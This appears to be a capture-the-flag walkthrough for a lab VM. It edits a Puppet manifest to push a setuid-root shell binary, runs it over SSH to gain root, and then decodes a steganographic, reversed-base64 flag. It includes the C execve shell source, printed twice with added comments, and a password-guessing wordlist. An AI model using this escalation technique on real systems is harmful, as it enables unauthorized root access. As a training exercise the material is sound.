reticulatingsplines.gif | |
Nothing useful here...
Let's go back to the other user.
cat /etc/puppet/modules/fiveeights/manifests/init.pp | |
## Nick's secret file hide the screw-ups | |
class fiveeights { | |
## private key held elsewhere. Keep looking | |
file { '/home/nleeson/.ssh/authorized_keys': | |
content => "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCTPnm+I5zEPNUHc1PgmsIxK8XCvtRECY6nTFOdNL3CxVBepWLv0wgPWBIUAkP9nfPUshXo1EIjcvb0+RGtJ8KNbVK4vW2ZCwgNicUoYnCcVtSrGtz9oAnKpeGcCKAuHG6ybt4Opxe75eF4dZt2/aDRrPMw8PK8l8a3o9ZdJlIgdLiWORPiga/zUu1zuySkQPFHzPBp29MvWVwAYsssEjcXINfuvysPbdBzMJaJ2o4jmFV9g/uCz3xjRi9zULP1VpoRYtZUQadU2CpuN1RtVDeoSeYVe6vYkeLz6rCBQTUfi9Nea4X1JtvaTfnrquRMWOr43WnMMcdFpIsBd8oCI4jH root@puppet", | |
} | |
} | |
cd /etc/puppet/modules/fiveeights/manifests | |
cp init.pp /etc/puppet/ | |
export TERM=xterm | |
vi init.pp | |
file { [ "/tmp/spin" ]: | |
ensure => present, | |
mode => 4755, | |
owner => root, | |
group => root, | |
source => "puppet:///modules/wiggle/spin"; | |
} | |
Wait for puppet to push the file to /tmp.
ssh -i nleeson_key nleeson@192.168.122.3 | |
cd tmp/ | |
./spin | |
id | |
uid=1000(nleeson) gid=1000(nleeson) euid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(nleeson) | |
cd /root | |
ls -alh | |
file me.jpeg | |
me.jpeg: JPEG image data, JFIF standard 1.01 | |
scp me.jpeg root@192.168.43.95:/root/Desktop | |
steghide --extract -sf me.jpeg | |
reticulatingsplines | |
wrote extracted data to "primate_egyptian_flag.txt". | |
cat primate_egyptian_flag.txt | |
Hex Code | |
674143496741434967414349674143496741434967414349674143496741 | |
69434b34694c7555336235426963765a47497a4e5859694269636c526d62 | |
6c5a4749684279636e556d636c686b430a67414349674143496741434967 | |
41434967414349674143496741434967414349674143494b386c4c743053 | |
4c7538464967414349674143496734534c73414349674143496741434967 | |
4143490a6741434967414349674143496741434967414349674143496741 | |
43496741434967414349674143494b34435967414349674143496763794a | |
74347958663543586742434938424349674143490a663931586639315866 | |
393158663931586639315875307a4b7273434c6741434967414349674143 | |
4967416943634243496734434c6741795867414349674143496741795867 | |
414358674143490a39305450393054503930545039305450393054503934 | |
796276396d4c666843496741434967414349674143494b77484967414349 | |
3878335838394666663931586639315838783358703831580a3842434967 | |
414349674143496741434967414349674143496e346e6667414349674143 | |
496741434967414349676f41666741434967774866397758503831545039 | |
30545039774866393054500a677746496741434967414349674143496741 | |
434967414349674143496741434967414349674143496741434967414349 | |
4b384349673847497642794a2b424749674143496741794a2b4243490a67 | |
636966674243496741434967414349674143496741434967414349674143 | |
4967414349674143496741434967414349674143494b3843496738474976 | |
4243496741434963426d66764143490a765a47496b355759673457616864 | |
575967553259753947493139576567384764674d6e62766c476468785764 | |
30466d636e353262447067434b41794a7434795866393158753043596741 | |
43490a673847646751575a704a486467556d646e6b6b434b4153496e4647 | |
626d7077637068476467636d62704a5864304258596a4269627642535a74 | |
6c476467674764346c326367554761304269630a734233636852585a7442 | |
7964764a486130425362764a6e5a676b5859334647496c5a336274427962 | |
3042434c6c4a585a6f424364704a474968424363314279636e3557616f52 | |
4849346c57620a3042435a6c6c33627135575a67556d6468684749313957 | |
6567554763766847494a42694c7a646d627068476467515859674d486470 | |
3947627768585a6749575a3342435a75466d43306c32620a774258596755 | |
6d596751476231393264675133596c423363684279637068476467343262 | |
67733259684a475a6c566d5a4b495864766c48496b355759673432627052 | |
6e6376424849304647610a6a563263674d57613046576276525864684279 | |
626b427962304243646c4e48496c4a5859674d58545742535a7a56476130 | |
42434c6c5233627542695a507067437551575a304657616a566d630a674d | |
335a756c4761304243636c56326167384764675148616e563362674d5861 | |
6f524849764e6e437351585a774258647742795a756c3263314279636c52 | |
58596b425864676b4864704a58640a4331474d6b3557595342434c754e6a | |
5179314749765248497a746d6268684764676b6e6268316b434b34535a73 | |
4233626c42484979396d5a6767325a31396d626c42795970315759756c48 | |
5a0a354279617546476130424362686c32596c42336367456b434b346952 | |
554e45497a6c47613042795a756c47647a564764674933626d4269657535 | |
57613256326167516d62684269576c5258650a685a6e436c68476467516d | |
62684279636c646d626c78476268683259675532636c6847646777476268 | |
42795a756c47647a394761674933626d427961786b576230427a5a673847 | |
64675533620a68424364755632596c4a48497a6c4761674933626d426962 | |
7a496d637442796230424364686847496c68476467593262674158613042 | |
53516734535a6a6c6d646b4647496c786d59685648620a765a47496e3557 | |
61723932627342535a7946474931395765675957616749585a3052586133 | |
52484979394749444a565367343262675557624b5158614942694c6c4e6d | |
6268523363704e33630a30564762773132624442434c7539474976646b43 | |
4b34535a6e35575a737857596f4e6d436c6847646751575a305647627731 | |
32626a42535a324647616749336267516e6270684749684269630a7a526d | |
626c6c6d6347426963313945496d394749784d43496c5232627a6c47636c | |
42695a7642534e306f7a4e774179623042434d7a6f6a4e7741694f6c7832 | |
59796c3259675547613042535a0a676f77507534694c7534326270523359 | |
6c356d62764e47496c684764674d334a304647615842694c7555544f3545 | |
4449444a6b51676b79516f414361304a33624f42535a6f526c43756c4549 | |
0a6741434967414349674143496741434967414349674143496741434967 | |
414349674143496741434967414349674143496741434967414349674143 | |
49674143496741434967414349674143490a3d6f515a794657623068325a | |
http://www.unit-conversion.info/texttools/hexadecimal/ | |
gACIgACIgACIgACIgACIgACIgACIgAiCK4iLuU3b5BicvZGIzNXYiBiclRmblZGIhBycnUmclhkC | |
gACIgACIgACIgACIgACIgACIgACIgACIgACIK8lLt0SLu8FIgACIgACIg4SLsACIgACIgACIgACI | |
gACIgACIgACIgACIgACIgACIgACIgACIgACIgACIK4CYgACIgACIgcyJt4yXf5CXgBCI8BCIgACI | |
f91Xf91Xf91Xf91Xf91Xu0zKrsCLgACIgACIgACIgAiCcBCIg4CLgAyXgACIgACIgAyXgACXgACI | |
90TP90TP90TP90TP90TP94ybv9mLfhCIgACIgACIgACIKwHIgACI8x3X89Fff91Xf91X8x3Xp81X | |
8BCIgACIgACIgACIgACIgACIn4nfgACIgACIgACIgACIgoAfgACIgwHf9wXP81TP90TP9wHf90TP | |
gwFIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIK8CIg8GIvByJ+BGIgACIgAyJ+BCI | |
gcifgBCIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIK8CIg8GIvBCIgACIcBmfvACI | |
vZGIk5WYg4WahdWYgU2Yu9GI19Weg8GdgMnbvlGdhxWd0Fmcn52bDpgCKAyJt4yXf91Xu0CYgACI | |
g8GdgQWZpJHdgUmdnkkCKASInFGbmpwcphGdgcmbpJXd0BXYjBibvBSZtlGdggGd4l2cgUGa0Bic | |
sB3chRXZtBydvJHa0BSbvJnZgkXY3FGIlZ3btByb0BCLlJXZoBCdpJGIhBCc1Bycn5WaoRHI4lWb | |
0BCZll3bq5WZgUmdhhGI19WegUGcvhGIJBiLzdmbphGdgQXYgMHdp9GbwhXZgIWZ3BCZuFmC0l2b | |
wBXYgUmYgQGb192dgQ3YlB3chBycphGdg42bgs2YhJGZlVmZKIXdvlHIk5WYg42bpRncvBHI0FGa | |
jV2cgMWa0FWbvRXdhBybkByb0BCdlNHIlJXYgMXTWBSZzVGa0BCLlR3buBiZPpgCuQWZ0FWajVmc | |
gM3ZulGa0BCclV2ag8GdgQHanV3bgMXaoRHIvNnCsQXZwBXdwByZul2c1ByclRXYkBXdgkHdpJXd | |
C1GMk5WYSBCLuNjQy1GIvRHIztmbhhGdgknbh1kCK4SZsB3blBHIy9mZgg2Z19mblByYp1WYulHZ | |
5ByauFGa0BCbhl2YlB3cgEkCK4iRUNEIzlGa0ByZulGdzVGdgI3bmBieu5Wa2V2agQmbhBiWlRXe | |
hZnClhGdgQmbhBycldmblxGbhh2YgU2clhGdgwGbhByZulGdz9GagI3bmByaxkWb0BzZg8GdgU3b | |
hBCduV2YlJHIzlGagI3bmBibzImctByb0BCdhhGIlhGdgY2bgAXa0BSQg4SZjlmdkFGIlxmYhVHb | |
vZGIn5War92bsBSZyFGI19WegYWagIXZ0RXa3RHIy9GIDJVSg42bgUWbKQXaIBiLlNmbhR3cpN3c | |
0VGbw12bDBCLu9GIvdkCK4SZn5WZsxWYoNmClhGdgQWZ0VGbw12bjBSZ2FGagI3bgQnbphGIhBic | |
zRmbllmcGBic19EIm9GIxMCIlR2bzlGclBiZvBSN0ozNwAyb0BCMzojNwAiOlx2Yyl2YgUGa0BSZ | |
gowPu4iLu42bpR3Yl5mbvNGIlhGdgM3J0FGaXBiLuUTO5EDIDJkQgkyQoACa0J3bOBSZoRlCulEI | |
gACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACI | |
=oQZyFWb0h2Z | |
This looks like a single line of base64 that has been reversed.
CkhlcmUncyBhIGZlbmRlciBiYXNzIGZvciB5b3UuLi4KCiAgICAgICAgICAgICAgICAgICAgICAg | |
ICAgICAgICAgICAsLS4gICAgICAgIF8uLS0tLl8KICAgICAgICAgICAgICAgICAgICAgICAgICAg | |
ICAgICB8ICBgXC5fXy4tJycgICAgICAgYC4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | |
ICAgXCAgXyAgICAgICAgXyAgLC4gICBcCiAgICAgICAgICAgLCsrKz0uX19fX19fX19fX19fX19f | |
X18pX3x8X19fX19ffF98X3x8ICAgIHwKICAgICAgICAgIChfLm9vby49PT09PT09PT09PT09PT09 | |
PT09fHw9PT09PT18PXw9fHwgICAgfAogICAgICAgICAgICAgfn4nICAgICAgICAgICAgICAgICB8 | |
ICB+JyAgICAgIGB+JyBvIG8gIC8KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwg | |
ICAvfmBcICAgICBvIG8gIC8KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBgficg | |
ICAgYC0uX19fXy4tJyAKCgpDb25ncmF0dWxhdGlvbnMgdG8geW91IG9uY2UgYWdhaW4gYW5kIGZv | |
ciB0aGUgc2l4dGggdGltZSBvbiBjYXB0dXJpbmcgdGhpcwpmbGFnISAKCkkndmUgdHJpZWQgdG8g | |
bWl4IHRoaW5ncyB1cCBhIGJpdCBoZXJlLCB0byBtb3ZlIGF3YXkgZnJvbSB0aHJvdyBtZXRhc3Bs | |
b2l0CmFuZCB3ZWIgZXhwbG9pdHMgYXQgdGhpbmdzLiBJIGhvcGUgeW91IGhhdmUgZW5qb3llZCB0 | |
aGF0IHBvcnRpb24gYW5kIHlvdXIKZmVlZGJhY2sgb24gdGhpcyBhc3BlY3Qgd291bGQgYmUgYXBw | |
cmVjaWF0ZWQuCgpPZiBub3RlLCB0aGVzZSBWTXMgYXJlIHNldCB0byBkbyBhdXRvbWF0aWMgc2Vj | |
dXJpdHkgdXBkYXRlcyB1c2luZyBwdXBwZXQsCnNvIHRoaXMgb3VnaHQgdG8ga2VlcCB0aGluZ3Mg | |
ZHluYW1pYyBlbm91Z2ggZm9yIHBlb3BsZS4KCk1hbnkgdGhhbmtzIHRvIG1yQjNuLCBSYW5kMG1C | |
eXRlWiBhbmQga2V2aW5ueiBmb3IgdGVzdGluZyB0aGlzIENURi4KCkEgc3BlY2lhbCB0aGFuayB5 | |
b3UgdG8gZzB0bWkxayBmb3IgaG9zdGluZyBhbGwgdGhlc2UgY2hhbGxlbmdlcyBhbmQgdGhlCnZh | |
bHVhYmxlIGFkdmljZS4gQSB0aXAgb2YgdGhlIGhhdCB0byBtcmIzbiBmb3IgaGlzIHJlY2VudCBh | |
c3Npc3RhbmNlLiBIaXQKbWUgb24gSVJDIG9yIHR3aXR0ZXIgaWYgeW91IGFyZSBsb29raW5nIGZv | |
ciBhIGhpbnQgb3IgaGF2ZSBjb21wbGV0ZWQgdGhlCmNoYWxsZW5nZS4KCkdvIG9uLCBDb21wbGV0 | |
ZSB0aGUgY2lyY2xlOiAwNjozMCB0byAwNzo0NSBvZiBlcGlzb2RlICMxIG9mIE91ciBGcmllbmRz | |
IEluClRoZSBOb3J0aCAoQykgQkJDIDE5OTUuLiBXaGF0J3MgdGhlIGNvbm5lY3Rpb24uLi4uPwog | |
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | |
Z2h0bWFyZQo= | |
base64 -d code.txt | |
Here's a fender bass for you... | |
,-. _.---._ | |
| `\.__.-'' `. | |
\ _ _ ,. \ | |
,+++=._________________)_||______|_|_|| | | |
(_.ooo.===================||======|=|=|| | | |
~~' | ~' `~' o o / | |
\ /~`\ o o / | |
`~' `-.____.-' | |
Congratulations to you once again and for the sixth time on capturing this | |
flag! | |
I've tried to mix things up a bit here, to move away from throw metasploit | |
and web exploits at things. I hope you have enjoyed that portion and your | |
feedback on this aspect would be appreciated. | |
Of note, these VMs are set to do automatic security updates using puppet, | |
so this ought to keep things dynamic enough for people. | |
Many thanks to mrB3n, Rand0mByteZ and kevinnz for testing this CTF. | |
A special thank you to g0tmi1k for hosting all these challenges and the | |
valuable advice. A tip of the hat to mrb3n for his recent assistance. Hit | |
me on IRC or twitter if you are looking for a hint or have completed the | |
challenge. | |
Go on, Complete the circle: 06:30 to 07:45 of episode #1 of Our Friends In | |
The North (C) BBC 1995.. What's the connection....? |
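def reverse(string):
    """Return the characters of ``string`` in reverse order, as one string.

    The walkthrough uses this to undo the reversal of a base64 line
    before decoding it.

    Args:
        string: the text to reverse (any sequence of one-character strings).

    Returns:
        A new ``str`` with the items of ``string`` in reverse order; an
        empty input gives an empty string.
    """
    # reversed() + join replaces the hand-written swap loop, which also
    # shadowed the built-in ``str`` with a local list.
    return ''.join(reversed(string))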
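# The parenthesised call runs on both Python 2 and Python 3; the bare
# print statement is a syntax error on Python 3.
print(reverse('gACIgACIgACIgACIgACIgACIgACIgAiCK4iLuU3b5BicvZGIzNXYiBiclRmblZGIhBycnUmclhkC'))
#include <unistd.h>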
/*
 * Replace the current process image with /bin/sh.
 *
 * The argument vector is {"/bin/sh", NULL} and the environment pointer
 * handed to execve() is NULL.  The result of execve() is not checked.
 *
 * The program makes no setuid/setgid call of its own: whatever privilege
 * the resulting shell holds comes from the owner and mode of the
 * installed binary (the walkthrough's Puppet resource uses mode 4755,
 * owner root), not from this code.
 */
int main() {
    char *shell_argv[] = { "/bin/sh", NULL };

    execve(shell_argv[0], shell_argv, NULL);

    /* Only reached if execve() failed; falling off the end of main
     * in the original yields the same exit status. */
    return 0;
}
#include <unistd.h> | |
/*
 * Replace the current process image with /bin/sh.
 *
 * argv is {"/bin/sh", NULL}; execve() is given a NULL environment and
 * its return value is ignored.
 *
 * Nothing here changes user or group IDs.  A shell started this way is
 * only privileged when the binary itself has been installed setuid, so
 * the defensive control is on who can place files that get installed
 * with such a mode.
 */
int main() {
    char *shell_argv[] = { "/bin/sh", NULL };

    execve(shell_argv[0], shell_argv, NULL);

    /* Only reached if execve() failed; equivalent to the original
     * falling off the end of main. */
    return 0;
}
Orleans | |
rising | |
gambler | |
mother | |
tailor | |
sweetheart | |
suitcase | |
satisfied | |
glasses | |
around | |
pleasure | |
rambling | |
sister | |
platform | |
almost | |
house | |
neworleans | |
therisingsun | |
poorgirl | |
bluejeans | |
jeans | |
blue | |
trunk | |
root | |
administrator | |
guest | |
krbtgt | |
domains | |
admins | |
bin | |
none | |
eric | |
burdon | |
ericburdon |